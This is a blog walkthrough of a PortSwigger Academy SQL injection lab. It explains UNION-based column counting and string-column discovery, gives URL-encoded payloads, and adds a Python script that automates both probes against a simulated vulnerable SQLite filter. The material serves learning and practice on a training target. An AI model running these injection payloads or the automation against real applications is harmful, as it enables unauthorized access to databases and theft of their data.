Portswigger Academy | SQLi Lab

Noureldin Ehab | Creeper.exe
5 min read · Apr 19, 2022

WhoAmI

Hey, I am Nour. I am a software engineering student, and here are some of the communities I am part of:

  • IBM Community leader and IBMZ Student Ambassador
  • AWS Community Builder
  • Microsoft Student Ambassador

I also love solving and creating OSINT CTFs at @Hacktoria. Connect with me on LinkedIn and Twitter.

PS: I love talking to everyone.

Now, enough introductions, let's get into today's lab hehe.

This lab contains an SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response, so you can use a UNION attack to retrieve data from other tables. To construct such an attack, you first need to determine the number of columns returned by the query. You can do this using a technique you learned in a previous lab. The next step is to identify a column that is compatible with string data.

The lab will provide a random value that you need to make appear within the query results. To solve the lab, perform an SQL injection UNION attack that returns an additional row containing the value provided. This technique helps you determine which columns are compatible with string data.

NOTE: This Is For Educational Purposes Only

Solution

Before we do anything, we need to understand the application, so let's click around and note down the interesting functionality we find.

Now that we know the main functionality, let's see what we need to do in this lab.

[Task 1] Determine the number of columns

To determine the number of columns we can use the same technique as in the last lab: a UNION attack in which we keep adding NULLs until the error disappears. The number of NULLs in the first payload that succeeds equals the number of columns returned by the original query.

Time for a quick SQL crash course

What is SQL?
- SQL (Structured Query Language) is the language used for storing, manipulating and retrieving data in relational databases.

What does a database consist of?
- A database is a collection of tables. Each table consists of columns (fields) and rows (records): each column holds one specific attribute, and each row holds one value for each of those attributes.

What is a Query?
- A query is a request for data from one table or a combination of tables.

- SELECT … FROM: selects columns from a table in the database.

- UNION: combines the results of two or more SELECT statements into one result set. Every SELECT must return the same number of columns, in the same order, and the data type in each position must be compatible across the SELECTs; otherwise the database rejects the query.

NOTE:
NULL is used for attributes that have no value. It is compatible with every column type, which is why it is the safe placeholder when we do not yet know a column's type.
-- starts a comment, so everything after it (including the rest of the application's original query, such as the closing quote) is ignored. On MySQL the comment sequence needs a space after it (-- ), or you can use # instead.

To check for SQL injection we can append a single quote (') to the category parameter in the URL. If the parameter is concatenated into the query unescaped, the unbalanced quote breaks the SQL syntax and the application returns an error instead of the product list.

Now that we know the application is vulnerable to SQL injection, let's craft a payload. Our first goal is to find out how many columns the query returns.

First, we need to intercept the request that sets the product category filter so we can modify it.

We can start by replacing the value of the category parameter with
'UNION SELECT NULL, NULL--

(Don't forget to URL-encode the payload, for example by selecting it in Burp Repeater and pressing Ctrl + U. The + signs in the payloads below are URL-encoded spaces.)

This gives an error because the number of columns in our SELECT does not match the number returned by the original query, so we keep adding one NULL at a time until the error disappears.

The final payload (three columns):

'+UNION+SELECT+NULL,+NULL,+NULL--

Now that we know the query returns three columns, let's move on to the next task: identifying a column that is compatible with string data.

[Task 2] Identify a column that is compatible with string data

Time for another SQL crash course:

What does data type mean?
In computer science and computer programming, a data type or simply type is an attribute of data that tells the compiler or interpreter how the programmer intends to use the data. Most programming languages support basic data types of integer numbers (of varying sizes), floating-point numbers (which approximate real numbers), characters, and Booleans. A data type constrains the values that an expression, such as a variable or a function, might take. This data type defines the operations that can be done on the data, the meaning of the data, and the way values of that type can be stored. A data type provides a set of values from which an expression (i.e. variable, function, etc.) may take its values. (According to Wikipedia)

What is a string data type?

In computer programming, a string is traditionally a sequence of characters (a word for example) (According to Wikipedia)

Now that we know what a string is, let's see how to find the column that accepts string data.

We take the payload from Task 1 and replace one NULL at a time with a string. If the query returns an error, that column's data type is not compatible with strings; if the string comes back in the results, that column accepts string data. For this lab the string must be the random value the lab gives you, because the lab checks for exactly that value in the response.

The final payload (the second column accepts strings; replace Nour with the value the lab provides):

'+UNION+SELECT+NULL,'Nour',+NULL--
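As an added example (not part of the original post or of the PortSwigger lab), the script below automates Task 1 and Task 2 against a simulated vulnerable category filter. The products table, its column names and the sample rows are constructed here; the real lab schema is not shown on the page. The endpoint is modelled as a function that concatenates the parameter into the SQL and answers 200 with rows or 500 with the database error, which is the same oracle we read from the lab's responses. One caveat: SQLite is loosely typed, so the string probe in Task 2 succeeds in every column position; on a strictly typed DBMS such as PostgreSQL the non-text positions fail with a type error and the code's error check drops them.

```python
import sqlite3
from urllib.parse import quote_plus

# Constructed stand-in for the lab's product table; the table and column
# names are assumptions, the real lab schema is not shown on the page.
_conn = sqlite3.connect(":memory:")
_conn.executescript("""
CREATE TABLE products (id INTEGER, name TEXT, price INTEGER, category TEXT);
INSERT INTO products VALUES (1, 'Folding Chair', 20, 'Gifts');
INSERT INTO products VALUES (2, 'Mood Lamp',     35, 'Gifts');
INSERT INTO products VALUES (3, 'Giant Pillow',  60, 'Lifestyle');
""")


def vulnerable_filter(category):
    """Simulated category filter: the parameter is concatenated straight into
    the SQL string, which is the injection point. Returns (status, body) the
    way an HTTP endpoint would: 200 with the rows, or 500 with the DB error."""
    sql = f"SELECT id, name, price FROM products WHERE category = '{category}'"
    try:
        return 200, _conn.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return 500, str(exc)


def as_url_param(payload):
    """The payload as it travels in the URL: spaces become '+', quotes %27."""
    return "/filter?category=" + quote_plus(payload)


def detect_injection(category="Gifts"):
    """A lone quote unbalances the query; an error response suggests injection."""
    status, _ = vulnerable_filter(category + "'")
    return status == 500


def count_columns(max_cols=10):
    """Task 1: UNION SELECT one NULL, then two, ... until the error disappears."""
    for n in range(1, max_cols + 1):
        payload = "' UNION SELECT " + ",".join(["NULL"] * n) + "--"
        status, _ = vulnerable_filter(payload)
        if status == 200:
            return n
    return None


def string_compatible_columns(marker, n_cols):
    """Task 2: place the marker in one column position at a time. A position is
    string-compatible when the query succeeds and the marker comes back in a
    row. A strictly typed DBMS errors on non-text positions, which the status
    check skips; SQLite coerces, so every position passes here."""
    compatible = []
    for i in range(n_cols):
        cells = ["NULL"] * n_cols
        cells[i] = f"'{marker}'"
        status, rows = vulnerable_filter("' UNION SELECT " + ",".join(cells) + "--")
        if status == 200 and any(marker in row for row in rows):
            compatible.append(i + 1)  # 1-based column position
    return compatible


if __name__ == "__main__":
    print("injectable:", detect_injection())
    n = count_columns()
    print("columns:", n, as_url_param("' UNION SELECT " + ",".join(["NULL"] * n) + "--"))
    print("string-compatible positions:", string_compatible_columns("abc123", n))
```

The marker check matters as much as the status code: a query can succeed without the value being rendered (for example if the application only displays some columns), and the lab is solved only when the provided value appears in the response.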

Newsletter

I will be sharing my learning journey, cyber security news, new CVEs, study resources and more. Feel free to subscribe 😊 and please don't forget to drink water 🌊

⭐ I love connecting with different people, so if you want to say hi, I'll be happy to meet you! :)

LinkedIn
Twitter
